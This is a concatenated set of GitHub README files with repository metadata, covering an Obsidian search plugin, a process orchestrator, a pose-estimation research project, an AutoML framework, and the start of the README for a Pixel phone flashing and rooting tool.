# Omnisearch for Obsidian [![Sponsor me](https://img.shields.io/badge/%E2%9D%A4%20Like%20this%20plugin%3F-Sponsor%20me!-ff69b4)](https://github.com/sponsors/scambier) ![Obsidian plugin](https://img.shields.io/endpoint?url=https%3A%2F%2Fscambier.xyz%2Fobsidian-endpoints%2Fomnisearch.json) ![GitHub release (latest by date and asset)](https://img.shields.io/github/downloads/scambier/obsidian-omnisearch/latest/main.js) ![GitHub release (latest by date including pre-releases)](https://img.shields.io/github/v/release/scambier/obsidian-omnisearch) ![GitHub release (latest by date including pre-releases)](https://img.shields.io/github/v/release/scambier/obsidian-omnisearch?include_prereleases&label=BRAT%20beta) > ๐Ÿ† Winner of the _[2023 Gems of the Year](https://obsidian.md/blog/2023-goty-winners/)_ in the "Existing plugin" category ๐Ÿ† --- **Omnisearch** is a search engine that "_just works_". It always instantly shows you the most relevant results, thanks to its smart weighting algorithm. Under the hood, it uses the excellent [MiniSearch](https://github.com/lucaong/minisearch) library. This free plugin is totally unrelated to the omnisearch.ai paid product. ![](https://raw.githubusercontent.com/scambier/obsidian-omnisearch/master/images/omnisearch.gif) ## Documentation https://publish.obsidian.md/omnisearch/Index ## Installation - Omnisearch is available on [the official Community Plugins repository](https://obsidian.md/plugins?search=Omnisearch). - Beta releases can be installed through [BRAT](https://github.com/TfTHacker/obsidian42-brat). **Be advised that those versions can be buggy and break things.** You can check the [CHANGELOG](./CHANGELOG.md) for more information on the different versions. ## Features > Omnisearch's first goal is to _locate_ files instantly. You can see it as a _Quick Switcher_ on steroids. - Find your **๐Ÿ“notes, ๐Ÿ“„PDFs, and ๐Ÿ–ผimages** faster than ever - Images and PDF indexing is available through [Text Extractor](https://github.com/scambier/obsidian-text-extractor) - Automatic document scoring using the [BM25 algorithm](https://github.com/lucaong/minisearch/issues/129#issuecomment-1046257399) - The relevance of a document against a query depends on the number of times the query terms appear in the document, its filename, and its headings - Keyboard first: you never have to use your mouse - Workflow similar to the "Quick Switcher" core plugin - Opt-in local HTTP server to query Omnisearch from outside of Obsidian - Resistance to typos - Switch between Vault and In-file search to quickly skim multiple results in a single note - Supports `"expressions in quotes"` and `-exclusions` - Filters file types with `.jpg` or `.md` - Directly Insert a `[[link]]` from the search results - Supports Vim navigation keys **Note:** support of Chinese depends on [this additional plugin](https://github.com/aidenlx/cm-chs-patch). Please read its documentation for more information. ## Projects that use Omnisearch _Submit a PR to add your own project!_ - [Omnisearch Companion](https://github.com/ALegendsTale/omnisearch-companion), an extension for your browser ([Firefox](https://addons.mozilla.org/en-US/firefox/addon/omnisearch-companion/), [Chrome](https://chromewebstore.google.com/detail/omnisearch-companion/kcjcnnlpfbilodfnnkpioijobpjhokkd)) - [Actions for Obsidian](https://actions.work/actions-for-obsidian) - [Userscripts](https://publish.obsidian.md/omnisearch/Inject+Omnisearch+results+into+your+search+engine) to inject Omnisearch into your favorite web search engine ## LICENSE Omnisearch is licensed under [GPL-3](https://tldrlegal.com/license/gnu-general-public-license-v3-(gpl-3)). ## Thanks To all people who donate through [Ko-Fi](https://ko-fi.com/scambier) or [Github Sponsors](https://github.com/sponsors/scambier) โค ![JetBrains Logo (Main) logo](https://resources.jetbrains.com/storage/products/company/brand/logos/jb_beam.svg)
A search engine that "just works" for Obsidian. Supports OCR and PDF indexing.
minisearch,obsidian,obsidian-md,obsidian-plugin,search,ocr,pdf
135
17
38
767
44
5
1
F1bonacc1/process-compose
## Process Compose [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](https://go.dev/) [![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-green.svg)](https://GitHub.com/F1bonacc1/process-compose/graphs/commit-activity) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com) ![Go Report](https://goreportcard.com/badge/github.com/F1bonacc1/process-compose) [![Releases](https://img.shields.io/github/downloads/F1bonacc1/process-compose/total.svg)]() ![X (formerly Twitter) URL](https://img.shields.io/twitter/url?url=https%3A%2F%2Ftwitter.com%2FProcessCompose&style=flat&logo=x&label=Process%20Compose) Process Compose is a simple and flexible scheduler and orchestrator to manage non-containerized applications. **Why?** Because sometimes you just don't want to deal with docker files, volume definitions, networks and docker registries. Since it's written in Go, Process Compose is a single binary file and has no other dependencies. Once [installed](https://f1bonacc1.github.io/process-compose/installation/), you just need to describe your workflow using a simple [YAML](http://yaml.org/) schema in a file called `process-compose.yaml`: ```yaml version: "0.5" processes: hello: command: echo 'Hello World' pc: command: echo 'From Process Compose' depends_on: hello: condition: process_completed ``` And start it by running `process-compose` from your terminal. Check the [Documentation](https://f1bonacc1.github.io/process-compose/launcher/) for more advanced use cases. #### Features: - Processes execution (in parallel or/and serially) - Processes dependencies and startup order - Process recovery policies - Manual process [re]start - Processes arguments `bash` or `zsh` style (or define your own shell) - Per process and global environment variables - Per process or global (single file) logs - Health checks (liveness and readiness) - Terminal User Interface (TUI) or CLI modes - Forking (services or daemons) processes - REST API (OpenAPI a.k.a Swagger) - Logs caching - Functions as both server and client - Configurable shortcuts - Merge Configuration Files - Namespaces - Run Multiple Replicas of a Process - Run a Foreground Process - Themes Support It is heavily inspired by [docker-compose](https://github.com/docker/compose), but without the need for containers. The configuration syntax tries to follow the docker-compose specifications, with a few minor additions and lots of subtractions. <img src="./imgs/tui.png" alt="TUI" style="zoom:67%;" /> ## Get Process Compose [Installation Instructions](https://f1bonacc1.github.io/process-compose/installation/) ## Documentation [Quick Start](https://f1bonacc1.github.io/process-compose/intro/) [Documentation](https://f1bonacc1.github.io/process-compose/launcher/) ## How to Contribute 1. Fork it 2. Create your feature branch (git checkout -b my-new-feature) 3. Commit your changes (git commit -am 'Add some feature') 4. Push to the branch (git push origin my-new-feature) 5. Create new Pull Request English is not my native language, so PRs correcting grammar or spelling are welcome and appreciated. ### Consider supporting the project โค๏ธ ##### Github (preferred) https://github.com/sponsors/F1bonacc1 ##### Bitcoin <img src="./imgs/btc.wallet.qr.png" style="zoom:50%;" alt="3QjRfBzwQASQfypATTwa6gxwUB65CX1jfX"/> 3QjRfBzwQASQfypATTwa6gxwUB65CX1jfX Thank **You**!
Process Compose is a simple and flexible scheduler and orchestrator to manage non-containerized applications.
go,golang,open-source,orchestration,orchestrator,processes,tui,workflows,docker
45
14
45
393
16
8
3
tjiiv-cprg/EPro-PnP
# EPro-PnP ๐Ÿ“ข **NEWS:** We have released [EPro-PnP-v2](https://github.com/tjiiv-cprg/EPro-PnP-v2). A new updated preprint can be found on [arXiv](https://arxiv.org/abs/2303.12787). **EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation** <br> In CVPR 2022 (Oral, **Best Student Paper**). [[paper](https://arxiv.org/pdf/2203.13254.pdf)][[video](https://www.youtube.com/watch?v=TonBodQ6EUU)] <br> [Hansheng Chen](https://lakonik.github.io/)\*<sup>1,2</sup>, [Pichao Wang](https://wangpichao.github.io/)โ€ <sup>2</sup>, [Fan Wang](https://scholar.google.com/citations?user=WCRGTHsAAAAJ&hl=en)<sup>2</sup>, [Wei Tian](https://scholar.google.com/citations?user=aYKQn88AAAAJ&hl=en)โ€ <sup>1</sup>, [Lu Xiong](https://www.researchgate.net/scientific-contributions/Lu-Xiong-71708073)<sup>1</sup>, [Hao Li](https://scholar.google.com/citations?user=pHN-QIwAAAAJ&hl=zh-CN)<sup>2</sup> <sup>1</sup>Tongji University, <sup>2</sup>Alibaba Group <br> \*Part of work done during an internship at Alibaba Group. <br> โ€ Corresponding Authors: Pichao Wang, Wei Tian. ## Introduction EPro-PnP is a probabilistic Perspective-n-Points (PnP) layer for end-to-end 6DoF pose estimation networks. Broadly speaking, it is essentially a continuous counterpart of the widely used categorical Softmax layer, and is theoretically generalizable to other learning models with nested <!-- $\mathrm{arg\,min}$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?%5Cmathrm%7Barg%5C%2Cmin%7D"> optimization. <img src="intro.png" width="500" alt=""/> Given the layer input: an <!-- $N$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?N">-point correspondence set <!-- $X = \left\{x^\text{3D}_i,x^\text{2D}_i,w^\text{2D}_i\,\middle|\,i=1\cdots N\right\}$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?X%20%3D%20%5Cleft%5C%7Bx%5E%5Ctext%7B3D%7D_i%2Cx%5E%5Ctext%7B2D%7D_i%2Cw%5E%5Ctext%7B2D%7D_i%5C%2C%5Cmiddle%7C%5C%2Ci%3D1%5Ccdots%20N%5Cright%5C%7D"> consisting of 3D object coordinates <!-- $x^\text{3D}_i \in \mathbb{R}^3$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?x%5E%5Ctext%7B3D%7D_i%20%5Cin%20%5Cmathbb%7BR%7D%5E3">, 2D image coordinates <!-- $x^\text{2D}_i \in \mathbb{R}^2$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?x%5E%5Ctext%7B2D%7D_i%20%5Cin%20%5Cmathbb%7BR%7D%5E2">, and 2D weights <!-- $w^\text{2D}_i \in \mathbb{R}^2_+ $ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?w%5E%5Ctext%7B2D%7D_i%20%5Cin%20%5Cmathbb%7BR%7D%5E2_%2B">, a conventional PnP solver searches for an optimal pose <!-- $y^\ast$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?y%5E%5Cast"> (rigid transformation in SE(3)) that minimizes the weighted reprojection error. Previous work tries to backpropagate through the PnP operation, yet <!-- $y^\ast$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?y%5E%5Cast"> is inherently non-differentiable due to the inner <!-- $\mathrm{arg\,min}$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?%5Cmathrm%7Barg%5C%2Cmin%7D"> operation. This leads to convergence issue if all the components in <!-- $X$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?X"> must be learned by the network. In contrast, our probabilistic PnP layer outputs a posterior distribution of pose, whose probability density <!-- $p(y|X)$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?p(y%7CX)"> can be derived for proper backpropagation. The distribution is approximated via Monte Carlo sampling. With EPro-PnP, the correspondences <!-- $X$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?X"> can be learned from scratch altogether by minimizing the KL divergence between the predicted and target pose distribution. ## Models ### V1 models in this repository #### **[EPro-PnP-6DoF](EPro-PnP-6DoF) for 6DoF pose estimation**<br> <img src="EPro-PnP-6DoF/viz.gif" width="500" alt=""/> #### **[EPro-PnP-Det](EPro-PnP-Det) for 3D object detection** <img src="EPro-PnP-Det/resources/viz.gif" width="500" alt=""/> ### New V2 models #### **[EPro-PnP-Det v2](https://github.com/tjiiv-cprg/EPro-PnP-v2/tree/main/EPro-PnP-Det_v2): state-of-the-art monocular 3D object detector** Main differences to [v1b](EPro-PnP-Det): - Use GaussianMixtureNLLLoss as auxiliary coordinate regression loss - Add auxiliary depth and bbox losses At the time of submission (Aug 30, 2022), EPro-PnP-Det v2 **ranks 1st** among all camera-based single-frame object detection models on the [official nuScenes benchmark](https://www.nuscenes.org/object-detection?externalData=no&mapData=no&modalities=Camera) (test split, without extra data). | Method | TTA | Backbone | NDS | mAP | mATE | mASE | mAOE | mAVE | mAAE | Schedule | |:---------------------------------------------------------|:---:|:---------|:---------:|:---------:|:---------:|:---------:|:---------:|:---------:|:---------:|:--------:| | EPro-PnP-Det v2 (ours) | Y | R101 | **0.490** | 0.423 | 0.547 | **0.236** | **0.302** | 1.071 | 0.123 | 12 ep | | [PETR](https://github.com/megvii-research/petr) | N | Swin-B | 0.483 | **0.445** | 0.627 | 0.249 | 0.449 | 0.927 | 0.141 | 24 ep | | [BEVDet-Base](https://github.com/HuangJunJie2017/BEVDet) | Y | Swin-B | 0.482 | 0.422 | **0.529** | **0.236** | 0.395 | 0.979 | 0.152 | 20 ep | | EPro-PnP-Det v2 (ours) | N | R101 | 0.481 | 0.409 | 0.559 | 0.239 | 0.325 | 1.090 | **0.115** | 12 ep | | [PolarFormer](https://github.com/fudan-zvg/PolarFormer) | N | R101 | 0.470 | 0.415 | 0.657 | 0.263 | 0.405 | **0.911** | 0.139 | 24 ep | | [BEVFormer-S](https://github.com/zhiqi-li/BEVFormer) | N | R101 | 0.462 | 0.409 | 0.650 | 0.261 | 0.439 | 0.925 | 0.147 | 24 ep | | [PETR](https://github.com/megvii-research/petr) | N | R101 | 0.455 | 0.391 | 0.647 | 0.251 | 0.433 | 0.933 | 0.143 | 24 ep | | [EPro-PnP-Det v1](EPro-PnP-Det_v2) | Y | R101 | 0.453 | 0.373 | 0.605 | 0.243 | 0.359 | 1.067 | 0.124 | 12 ep | | [PGD](https://github.com/open-mmlab/mmdetection3d) | Y | R101 | 0.448 | 0.386 | 0.626 | 0.245 | 0.451 | 1.509 | 0.127 | 24+24 ep | | [FCOS3D](https://github.com/open-mmlab/mmdetection3d) | Y | R101 | 0.428 | 0.358 | 0.690 | 0.249 | 0.452 | 1.434 | 0.124 | - | #### **[EPro-PnP-6DoF v2](https://github.com/tjiiv-cprg/EPro-PnP-v2/tree/main/EPro-PnP-6DoF_v2) for 6DoF pose estimation**<br> Main differences to [v1b](EPro-PnP-6DoF): - Fix w2d scale handling **(very important)** - Improve network initialization - Adjust loss weights With these updates the v2 model can be trained **without 3D models** to achieve better performance (ADD 0.1d = 93.83) than [GDRNet](https://github.com/THU-DA-6D-Pose-Group/GDR-Net) (ADD 0.1d = 93.6), unleashing the full potential of simple end-to-end training. ## Use EPro-PnP in Your Own Model We provide a [demo](demo/fit_identity.ipynb) on the usage of the EPro-PnP layer. ## Citation If you find this project useful in your research, please consider citing: ``` @inproceedings{epropnp, author = {Hansheng Chen and Pichao Wang and Fan Wang and Wei Tian and Lu Xiong and Hao Li, title = {EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation}, booktitle = {IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}, year = {2022} } ```
[CVPR 2022 Oral, Best Student Paper] EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation
pose-estimation,6dof,3d-object-detection,perspective-n-point,pytorch,cvpr,monocular,levenberg-marquardt,gauss-newton
0
1
0
24
51
1
0
sb-ai-lab/LightAutoML
<img src=https://github.com/AILab-MLTools/LightAutoML/raw/master/imgs/LightAutoML_logo_big.png /> # LightAutoML - automatic model creation framework [![Telegram](https://img.shields.io/badge/chat-on%20Telegram-2ba2d9.svg)](https://t.me/lightautoml) ![PyPI - Downloads](https://img.shields.io/pypi/dm/lightautoml?color=green&label=PyPI%20downloads&logo=pypi&logoColor=orange&style=plastic) ![Read the Docs](https://img.shields.io/readthedocs/lightautoml?style=plastic) [![Black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) ![Poetry-Lock](https://img.shields.io/github/workflow/status/sb-ai-lab/LightAutoML/Poetry%20run/master?label=Poetry-Lock) LightAutoML (LAMA) is an AutoML framework which provides automatic model creation for the following tasks: - binary classification - multiclass classification - regression Current version of the package handles datasets that have independent samples in each row. I.e. **each row is an object with its specific features and target**. Multitable datasets and sequences are a work in progress :) **Note**: we use [`AutoWoE`](https://pypi.org/project/autowoe) library to automatically create interpretable models. **Authors**: [Alexander Ryzhkov](https://kaggle.com/alexryzhkov), [Anton Vakhrushev](https://kaggle.com/btbpanda), [Dmitry Simakov](https://kaggle.com/simakov), Rinchin Damdinov, Vasilii Bunakov, Alexander Kirilin, Pavel Shvets. **Documentation** of LightAutoML is available [here](https://lightautoml.readthedocs.io/), you can also [generate](https://github.com/AILab-MLTools/LightAutoML/blob/master/.github/CONTRIBUTING.md#building-documentation) it. # (New features) GPU and Spark pipelines Full GPU and Spark pipelines for LightAutoML currently available for developers testing (still in progress). The code and tutorials for: - GPU pipeline is [available here](https://github.com/Rishat-skoltech/LightAutoML_GPU) - Spark pipeline is [available here](https://github.com/sb-ai-lab/SLAMA) <a name="toc"></a> # Table of Contents * [Installation LightAutoML from PyPI](#installation) * [Quick tour](#quicktour) * [Resources](#examples) * [Contributing to LightAutoML](#contributing) * [License](#apache) * [For developers](#developers) * [Support and feature requests](#support) <a name="installation"></a> # Installation To install LAMA framework on your machine from PyPI, execute following commands: ```bash # Install base functionality: pip install -U lightautoml # For partial installation use corresponding option. # Extra dependecies: [nlp, cv, report] # Or you can use 'all' to install everything pip install -U lightautoml[nlp] ``` Additionally, run following commands to enable pdf report generation: ```bash # MacOS brew install cairo pango gdk-pixbuf libffi # Debian / Ubuntu sudo apt-get install build-essential libcairo2 libpango-1.0-0 libpangocairo-1.0-0 libgdk-pixbuf2.0-0 libffi-dev shared-mime-info # Fedora sudo yum install redhat-rpm-config libffi-devel cairo pango gdk-pixbuf2 # Windows # follow this tutorial https://weasyprint.readthedocs.io/en/stable/install.html#windows ``` [Back to top](#toc) <a name="quicktour"></a> # Quick tour Let's solve the popular Kaggle Titanic competition below. There are two main ways to solve machine learning problems using LightAutoML: * Use ready preset for tabular data: ```python import pandas as pd from sklearn.metrics import f1_score from lightautoml.automl.presets.tabular_presets import TabularAutoML from lightautoml.tasks import Task df_train = pd.read_csv('../input/titanic/train.csv') df_test = pd.read_csv('../input/titanic/test.csv') automl = TabularAutoML( task = Task( name = 'binary', metric = lambda y_true, y_pred: f1_score(y_true, (y_pred > 0.5)*1)) ) oof_pred = automl.fit_predict( df_train, roles = {'target': 'Survived', 'drop': ['PassengerId']} ) test_pred = automl.predict(df_test) pd.DataFrame({ 'PassengerId':df_test.PassengerId, 'Survived': (test_pred.data[:, 0] > 0.5)*1 }).to_csv('submit.csv', index = False) ``` LighAutoML framework has a lot of ready-to-use parts and extensive customization options, to learn more check out the [resources](#Resources) section. [Back to top](#toc) <a name="examples"></a> # Resources ### Kaggle kernel examples of LightAutoML usage: - [Tabular Playground Series April 2021 competition solution](https://www.kaggle.com/alexryzhkov/n3-tps-april-21-lightautoml-starter) - [Titanic competition solution (80% accuracy)](https://www.kaggle.com/alexryzhkov/lightautoml-titanic-love) - [Titanic **12-code-lines** competition solution (78% accuracy)](https://www.kaggle.com/alexryzhkov/lightautoml-extreme-short-titanic-solution) - [House prices competition solution](https://www.kaggle.com/alexryzhkov/lightautoml-houseprices-love) - [Natural Language Processing with Disaster Tweets solution](https://www.kaggle.com/alexryzhkov/lightautoml-starter-nlp) - [Tabular Playground Series March 2021 competition solution](https://www.kaggle.com/alexryzhkov/lightautoml-starter-for-tabulardatamarch) - [Tabular Playground Series February 2021 competition solution](https://www.kaggle.com/alexryzhkov/lightautoml-tabulardata-love) - [Interpretable WhiteBox solution](https://www.kaggle.com/simakov/lama-whitebox-preset-example) - [Custom ML pipeline elements inside existing ones](https://www.kaggle.com/simakov/lama-custom-automl-pipeline-example) - [Custom ML pipeline elements inside existing ones](https://www.kaggle.com/simakov/lama-custom-automl-pipeline-example) - [Tabular Playground Series November 2022 competition solution with Neural Networks](https://www.kaggle.com/code/mikhailkuz/lightautoml-nn-happiness) ### Google Colab tutorials and [other examples](examples/): - [`Tutorial_1_basics.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_1_basics.ipynb) - get started with LightAutoML on tabular data. - [`Tutorial_2_WhiteBox_AutoWoE.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_2_WhiteBox_AutoWoE.ipynb) - creating interpretable models. - [`Tutorial_3_sql_data_source.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_3_sql_data_source.ipynb) - shows how to use LightAutoML presets (both standalone and time utilized variants) for solving ML tasks on tabular data from SQL data base instead of CSV. - [`Tutorial_4_NLP_Interpretation.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_4_NLP_Interpretation.ipynb) - example of using TabularNLPAutoML preset, LimeTextExplainer. - [`Tutorial_5_uplift.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_5_uplift.ipynb) - shows how to use LightAutoML for a uplift-modeling task. - [`Tutorial_6_custom_pipeline.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_6_custom_pipeline.ipynb) - shows how to create your own pipeline from specified blocks: pipelines for feature generation and feature selection, ML algorithms, hyperparameter optimization etc. - [`Tutorial_7_ICE_and_PDP_interpretation.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_7_ICE_and_PDP_interpretation.ipynb) - shows how to obtain local and global interpretation of model results using ICE and PDP approaches. - [`Tutorial_8_CV_preset.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_8_CV_preset.ipynb) - example of using TabularCVAutoML preset in CV multi-class classification task. - [`Tutorial_9_neural_networks.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_9_neural_networks.ipynb) - example of using Tabular preset with neural networks. - [`Tutorial_10_relational_data_with_star_scheme.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_10_relational_data_with_star_scheme.ipynb) - example of using Tabular preset with neural networks. - [`Tutorial_11_time_series.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_11_time_series.ipynb) - example of using Tabular preset with timeseries data. - [`Tutorial_12_Matching.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_12_Matching.ipynb) - example of using addon for matchig. **Note 1**: for production you have no need to use profiler (which increase work time and memory consomption), so please do not turn it on - it is in off state by default **Note 2**: to take a look at this report after the run, please comment last line of demo with report deletion command. ### Courses, videos and papers * **LightAutoML crash courses**: - (Russian) [AutoML course for OpenDataScience community](https://ods.ai/tracks/automl-course-part1) * **Video guides**: - (Russian) [LightAutoML webinar for Sberloga community](https://www.youtube.com/watch?v=ci8uqgWFJGg) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov), [Dmitry Simakov](https://kaggle.com/simakov)) - (Russian) [LightAutoML hands-on tutorial in Kaggle Kernels](https://www.youtube.com/watch?v=TYu1UG-E9e8) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov)) - (English) [Automated Machine Learning with LightAutoML: theory and practice](https://www.youtube.com/watch?v=4pbO673B9Oo) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov)) - (English) [LightAutoML framework general overview, benchmarks and advantages for business](https://vimeo.com/485383651) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov)) - (English) [LightAutoML practical guide - ML pipeline presets overview](https://vimeo.com/487166940) ([Dmitry Simakov](https://kaggle.com/simakov)) * **Papers**: - Anton Vakhrushev, Alexander Ryzhkov, Dmitry Simakov, Rinchin Damdinov, Maxim Savchenko, Alexander Tuzhilin ["LightAutoML: AutoML Solution for a Large Financial Services Ecosystem"](https://arxiv.org/pdf/2109.01528.pdf). arXiv:2109.01528, 2021. * **Articles about LightAutoML**: - (English) [LightAutoML vs Titanic: 80% accuracy in several lines of code (Medium)](https://alexmryzhkov.medium.com/lightautoml-preset-usage-tutorial-2cce7da6f936) - (English) [Hands-On Python Guide to LightAutoML โ€“ An Automatic ML Model Creation Framework (Analytic Indian Mag)](https://analyticsindiamag.com/hands-on-python-guide-to-lama-an-automatic-ml-model-creation-framework/?fbclid=IwAR0f0cVgQWaLI60m1IHMD6VZfmKce0ZXxw-O8VRTdRALsKtty8a-ouJex7g) [Back to top](#toc) <a name="contributing"></a> # Contributing to LightAutoML If you are interested in contributing to LightAutoML, please read the [Contributing Guide](.github/CONTRIBUTING.md) to get started. [Back to top](#toc) <a name="apache"></a> # License This project is licensed under the Apache License, Version 2.0. See [LICENSE](https://github.com/AILab-MLTools/LightAutoML/blob/master/LICENSE) file for more details. [Back to top](#toc) <a name="developers"></a> # For developers ## Build your own custom pipeline: ```python import pandas as pd from sklearn.metrics import f1_score from lightautoml.automl.presets.tabular_presets import TabularAutoML from lightautoml.tasks import Task df_train = pd.read_csv('../input/titanic/train.csv') df_test = pd.read_csv('../input/titanic/test.csv') # define that machine learning problem is binary classification task = Task("binary") reader = PandasToPandasReader(task, cv=N_FOLDS, random_state=RANDOM_STATE) # create a feature selector model0 = BoostLGBM( default_params={'learning_rate': 0.05, 'num_leaves': 64, 'seed': 42, 'num_threads': N_THREADS} ) pipe0 = LGBSimpleFeatures() mbie = ModelBasedImportanceEstimator() selector = ImportanceCutoffSelector(pipe0, model0, mbie, cutoff=0) # build first level pipeline for AutoML pipe = LGBSimpleFeatures() # stop after 20 iterations or after 30 seconds params_tuner1 = OptunaTuner(n_trials=20, timeout=30) model1 = BoostLGBM( default_params={'learning_rate': 0.05, 'num_leaves': 128, 'seed': 1, 'num_threads': N_THREADS} ) model2 = BoostLGBM( default_params={'learning_rate': 0.025, 'num_leaves': 64, 'seed': 2, 'num_threads': N_THREADS} ) pipeline_lvl1 = MLPipeline([ (model1, params_tuner1), model2 ], pre_selection=selector, features_pipeline=pipe, post_selection=None) # build second level pipeline for AutoML pipe1 = LGBSimpleFeatures() model = BoostLGBM( default_params={'learning_rate': 0.05, 'num_leaves': 64, 'max_bin': 1024, 'seed': 3, 'num_threads': N_THREADS}, freeze_defaults=True ) pipeline_lvl2 = MLPipeline([model], pre_selection=None, features_pipeline=pipe1, post_selection=None) # build AutoML pipeline automl = AutoML(reader, [ [pipeline_lvl1], [pipeline_lvl2], ], skip_conn=False) # train AutoML and get predictions oof_pred = automl.fit_predict(df_train, roles = {'target': 'Survived', 'drop': ['PassengerId']}) test_pred = automl.predict(df_test) pd.DataFrame({ 'PassengerId':df_test.PassengerId, 'Survived': (test_pred.data[:, 0] > 0.5)*1 }).to_csv('submit.csv', index = False) ``` [Back to top](#toc) <a name="support"></a> # Support and feature requests Seek prompt advice at [Telegram group](https://t.me/lightautoml). Open bug reports and feature requests on GitHub [issues](https://github.com/AILab-MLTools/LightAutoML/issues).
Fast and customizable framework for automatic ML model creation (AutoML)
automl,data-science,machine-learning,python,automated-machine-learning,automatic-machine-learning,automl-algorithms,binary-classification,kaggle,lama
1
15
97
204
28
42
4
badabing2005/PixelFlasher
<img src="/images/icon-dark-128.png" alt="PixelFlasher Icon" align="left" /> <h1> PixelFlasher </h1> [![License](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0) [![Github Releases](https://img.shields.io/github/downloads/badabing2005/PixelFlasher/total.svg?style=flat)](https://github.com/badabing2005/PixelFlasher/releases) ## DESCRIPTION As the name suggests this is an application to flash (update) Pixelโ„ข phones (possibly all Googleโ„ข made phones/tablets, YMMV.) PixelFlasher at its core is a UI layer (with bells and whistles) on top of adb / fastboot commands, hence many of its features can be used on non Pixel devices as well. (YMMV). The executable which can be found in [releases section](https://github.com/badabing2005/PixelFlasher/releases) is self contained and does not require Pythonโ„ข to be installed on the system. The application has two modes, normal mode (basic) and advanced mode (expert). **Basic mode:** Should suit most users. Some of the features in basic mode are: - Simple UI interface, click and go. No more command line, no more placing all files in one directory. - `boot.img` / `init_boot.img` management UI, select the boot / init_boot file to patch and click the patch button. Fully Automated patching with Magisk (without manual steps) and perform upgrades without losing root. No more manually extracting files transferring to the phone, patching / re-flashing and doing multiple reboots. No more setting airplane mode and clearing storage to retain Safetynet / Play Integrity passing. - Display details of `boot.img` (or `init_boot.img` for Pixel 7 or newer devices). - SHA1 checksum. - Origin (file it was extracted from). - Whether it is patched or not, and if it is patched. - What version of Magisk was used to patch it. - On what device it was patched. - Date of patching. - The SHA1 of the source boot.img file. - Option to Live boot from a choice of boot.img or patched image. - Flash just the boot / init_boot image. - Choose to keep data or wipe data while flashing (Full OTA flashing always keeps data). - Ability to flash even if multiple devices are connected to the computer. - Option to flash to inactive slot (Full OTA always flashes to inactive slot). - Display information about the phone. - ID - Hardware model. - Device architecture. - Current installed firmware (build). - If it is rooted with Magisk. - Magisk version (Magisk Tools). - Magisk Manager version (the app). - List installed Magisk modules. - Connection mode (Adb | Fastboot | Sideload | Recovery). - Bootloader version. - Active slot. - Android OS API version. - Convenient quick links to download Android platform tools or device firmware. - And a lot more... - Magisk Manager installation UI, [screenshot](images/Magisk-Installer.png). Supported versions: - stable (official) - beta (official) - canary (official) - debug (official) - delta - special builds that disable modules (used to recover from bootloops due to bad module(s) when safe mode does not work). - Magisk Backup Manager, [screenshot](images/Magisk-Backup-Manager.png). - List all Magisk backups currently on the device. - Highlight the one that is backup of the current installed version. - Delete backups. - Manually add backup from PC. - Auto Backup: PixelFlasher figures out what needs to be backed up, and if it finds it on the PC, it creates the backup. - Magisk settings management, [screenshot](images/magisk-settings.png): - Enable / disable Magisk modules, this comes in handy to disable suspect modules before an upgrade. - Install Magisk module. - Enable / disable Zygisk. - Enable / disable Magisk denylist. - Add / remove application to Magisk denylist (through PixelFlasher's App Manger). - Grant / deny / SU permissions to an app, with control of (through PixelFlasher's App Manger): - Enable / disable notifications - Enable / disable logging - Grant until (Forever, 10 min, 20 min, 30 min, 60 min) - Revoke SU permissions - Display Android Platform Tools (SDK) version and warn / block if the version is old. - Install APK (an app) file from the computer onto the device. - Wireless Manager, to wirelessly connect to adb debug or adb wireless with pairing support. - Advanced features are hidden to keep the interface simple and 